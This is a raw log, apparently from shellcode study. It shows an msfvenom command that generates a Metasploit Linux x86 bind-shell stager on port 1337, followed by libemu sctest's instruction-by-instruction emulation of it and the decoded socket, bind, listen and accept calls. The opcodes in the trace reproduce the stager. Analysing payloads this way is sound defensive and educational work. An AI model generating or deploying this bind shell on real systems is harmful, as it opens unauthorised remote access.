msfvenom -p linux/x86/shell/bind_nonx_tcp LPORT=1337 -a x86 --platform Linux | /usr/bin/sctest -vvv -Ss 100000 -G msf_nonx_bind_shell.dot
graph file msf_nonx_bind_shell.dot
verbose = 3
No encoder or badchars specified, outputting raw payload

[emu 0x0x9b35098 debug ] cpu state    eip=0x00417000
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x9b35098 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417000
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x9b35098 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 31DB                            xor ebx,ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417002
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x9b35098 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF ZF 
[emu 0x0x9b35098 debug ] 53                              push ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417003
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x9b35098 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF ZF 
[emu 0x0x9b35098 debug ] 43                              inc ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417004
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 53                              push ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417005
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 6A02                            push byte 0x2
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417007
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 6A66                            push byte 0x66
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417009
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 58                              pop eax
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041700a
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 99                              cwd 
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041700b
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 89E1                            mov ecx,esp
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041700d
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041700f
[emu 0x0x9b35098 debug ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 96                              xchg eax,esi
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417010
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 43                              inc ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417011
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 52                              push edx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417012
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 66680539                        push word 0x3905
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417016
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fbc  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 6653                            push bx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417018
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 89E1                            mov ecx,esp
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041701a
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fba  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 6A66                            push byte 0x66
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041701c
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fba  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fb6  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 58                              pop eax
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041701d
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fba  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 50                              push eax
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041701e
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fba  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fb6  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 51                              push ecx
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041701f
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fba  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 56                              push esi
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417020
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fba  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 89E1                            mov ecx,esp
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417022
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fae  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] CD80                            int 0x80
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417024
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fae  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] B066                            mov al,0x66
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417026
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fae  edx=0x00000000  ebx=0x00000002
[emu 0x0x9b35098 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] D1E3                            shl ebx,0x1
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417028
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fae  edx=0x00000000  ebx=0x00000004
[emu 0x0x9b35098 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] CD80                            int 0x80
int listen(int s=14, int backlog=4288442);
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041702a
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fae  edx=0x00000000  ebx=0x00000004
[emu 0x0x9b35098 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 52                              push edx
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041702b
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fae  edx=0x00000000  ebx=0x00000004
[emu 0x0x9b35098 debug ] esp=0x00416faa  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 52                              push edx
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041702c
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fae  edx=0x00000000  ebx=0x00000004
[emu 0x0x9b35098 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 56                              push esi
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041702d
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fae  edx=0x00000000  ebx=0x00000004
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: 
[emu 0x0x9b35098 debug ] 43                              inc ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041702e
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fae  edx=0x00000000  ebx=0x00000005
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] 89E1                            mov ecx,esp
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417030
[emu 0x0x9b35098 debug ] eax=0x00000000  ecx=0x00416fa2  edx=0x00000000  ebx=0x00000005
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] B066                            mov al,0x66
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417032
[emu 0x0x9b35098 debug ] eax=0x00000066  ecx=0x00416fa2  edx=0x00000000  ebx=0x00000005
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] CD80                            int 0x80
int accept(int s=14, struct sockaddr *addr=00000000, int *addrlen=00000000);
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417034
[emu 0x0x9b35098 debug ] eax=0x00000013  ecx=0x00416fa2  edx=0x00000000  ebx=0x00000005
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] 93                              xchg eax,ebx
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417035
[emu 0x0x9b35098 debug ] eax=0x00000005  ecx=0x00416fa2  edx=0x00000000  ebx=0x00000013
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] B60C                            mov dh,0xc
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417037
[emu 0x0x9b35098 debug ] eax=0x00000005  ecx=0x00416fa2  edx=0x00000c00  ebx=0x00000013
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] B003                            mov al,0x3
[emu 0x0x9b35098 debug ] cpu state    eip=0x00417039
[emu 0x0x9b35098 debug ] eax=0x00000003  ecx=0x00416fa2  edx=0x00000c00  ebx=0x00000013
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
[emu 0x0x9b35098 debug ] CD80                            int 0x80
stepcount 36
copying vertexes
optimizing graph
vertex 0x9b8b3c0
going forwards from 0x9b8b3c0
 -> vertex 0x9b8d560
 -> vertex 0x9b8d770
 -> vertex 0x9b8d8a8
 -> vertex 0x9b8da08
 -> vertex 0x9b8db80
 -> vertex 0x9b8dcf8
 -> vertex 0x9b8de70
 -> vertex 0x9b8e0a8
copying edges for 0x9b8e0a8
 -> 0x9b932f0
vertex 0x9b8e188
going forwards from 0x9b8e188
copying edges for 0x9b8e188
 -> 0x9b933c8
vertex 0x9b8e418
going forwards from 0x9b8e418
 -> vertex 0x9b8e4f8
 -> vertex 0x9b8e670
 -> vertex 0x9b8e7e8
 -> vertex 0x9b8eaa0
 -> vertex 0x9b8eb70
 -> vertex 0x9b8ece8
 -> vertex 0x9b8ee60
 -> vertex 0x9b8efd8
 -> vertex 0x9b8f150
 -> vertex 0x9b8f2c8
 -> vertex 0x9b8f440
copying edges for 0x9b8f440
 -> 0x9b93fd0
vertex 0x9b8f5b8
going forwards from 0x9b8f5b8
copying edges for 0x9b8f5b8
 -> 0x9b940a8
vertex 0x9b8f960
going forwards from 0x9b8f960
 -> vertex 0x9b8fa40
copying edges for 0x9b8fa40
 -> 0x9b942a8
vertex 0x9b8fbb8
going forwards from 0x9b8fbb8
copying edges for 0x9b8fbb8
 -> 0x9b94380
vertex 0x9b8fe28
going forwards from 0x9b8fe28
 -> vertex 0x9b8ff08
 -> vertex 0x9b90080
 -> vertex 0x9b901f8
 -> vertex 0x9b90370
 -> vertex 0x9b904e8
copying edges for 0x9b904e8
 -> 0x9b94980
vertex 0x9b90660
going forwards from 0x9b90660
copying edges for 0x9b90660
 -> 0x9b94a58
vertex 0x9b908f8
going forwards from 0x9b908f8
 -> vertex 0x9b909d8
 -> vertex 0x9b90b50
copying edges for 0x9b90b50
vertex 0x9b90cc8
going forwards from 0x9b90cc8
copying edges for 0x9b90cc8
[emu 0x0x9b35098 debug ] cpu state    eip=0x0041703b
[emu 0x0x9b35098 debug ] eax=0x00000003  ecx=0x00416fa2  edx=0x00000c00  ebx=0x00000013
[emu 0x0x9b35098 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x0000000e  edi=0x00000000
[emu 0x0x9b35098 debug ] Flags: PF 
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int bind (
     int sockfd = 14;
     struct sockaddr_in * my_addr = 0x00416fba => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 14597 (port=1337);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 0 (host=0.0.0.0);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int listen (
     int s = 14;
     int backlog = 4288442;
) =  0;
int accept (
     int sockfd = 14;
     sockaddr_in * addr = 0x00000000 => 
         none;
     int addrlen = 0x00000000 => 
         none;
) =  19;
